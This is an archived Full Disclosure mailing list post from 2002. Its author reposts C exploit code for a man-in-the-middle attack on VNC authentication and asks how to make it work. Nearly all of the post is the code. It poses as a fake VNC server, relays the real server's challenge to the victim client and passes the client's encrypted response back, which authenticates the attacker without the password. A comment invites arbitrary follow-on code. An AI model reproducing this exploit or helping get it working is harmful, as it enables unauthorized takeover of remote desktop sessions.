Full Disclosure mailing list archives
VNC Man in the Middle Exploit Code
From: "SynRak" <synrak () hotmail com>
Date: Sun, 8 Dec 2002 22:42:26 -0500
This was released a while back, and I have not been able to get it to function or find any additional information pertaining to this. Would anyone here possibly know how to get this to function successfully? Thanks all __________________________________________ Summary By using the below exploit code it is possible to use a VNC server without knowing its password by causing a client to authenticate through the attacking host, while the attacker redirects it to the server. Details Exploit: #include <netinet/in.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #define VNCPORT 5900 #define VNCSERVER "x.x.x.x" #define QUEUE 8 #define BUFSIZ 512 typedef char rfbProtocolVersionMsg[13]; #define sz_rfbProtocolVersionMsg 12 int main (int argc, char **argv) { int sockfd, clientfd, vncfd; int nbytes = 0; struct sockaddr_in server, client, vnc; int len = sizeof (client); char buf [BUFSIZ]; if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) { perror ("socket"); exit (-1); } bzero (&server, sizeof (server) ); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl (INADDR_ANY); server.sin_port = htons (VNCPORT); /* this is the fake VNC server */ if (bind (sockfd, (struct sockaddr *) &server, sizeof (server) ) == -1) { perror ("bind"); exit (-1); } listen (sockfd, QUEUE); if ( (clientfd = accept (sockfd, (struct sockaddr *) &client, &len) ) == -1) { perror ("accept"); exit (-1); } strcpy (buf, "RFB 003.003\n"); /* we must send VNC version number (from protocol) */ if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) { perror ("write"); exit (-1); } /* we also must read VNC version number (from protocol) */ if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); } buf [nbytes] = 0; printf ("version -> %s\n", buf); buf [0] = 0x00; buf [1] = 0x00; buf [2] = 0x00; buf [3] = 0x02; /* we send the authentication method code to the client */ if (write (clientfd, buf, 4) < 4) { perror ("write"); exit (-1); } if ( (vncfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) { perror ("socket"); exit (-1); } bzero (&vnc, sizeof (vnc) ); vnc.sin_family = AF_INET; vnc.sin_addr.s_addr = inet_addr (VNCSERVER); vnc.sin_port = htons (VNCPORT); /* we connect to the real VNC server */ if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) { perror ("connect"); exit (-1); } /* again, we read version number from the VNC server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); } strcpy (buf, "RFB 003.003\n"); /* and we send ours */ if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) { perror ("write"); exit (-1); } /* we now read authenticarion method code from VNC server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); } /* here is the challenge from server */ if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); } /* we send the challenge to the victim client */ if (write (clientfd, buf, 16) < 16) { perror ("write"); exit (-1); } /* we have the encrypted password from the client */ if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) { perror ("read"); exit (-1); } /* we send the encrypted password to the VNC server */ if (write (vncfd, buf, 16) < 16) { perror ("write"); exit (-1); } /* we read the result from the authentication process */ if (read (vncfd, buf, BUFSIZ) < 4) { perror ("read"); exit (-1); } /* at this point we should be authenticated */ /* place whatever code you want here */ close (clientfd); close (sockfd); close (vncfd); return 0; } Additional information The information has been provided by rsmc.
Current thread:
- VNC Man in the Middle Exploit Code SynRak (Dec 08)
- <Possible follow-ups>
- Re: VNC Man in the Middle Exploit Code petard (Dec 09)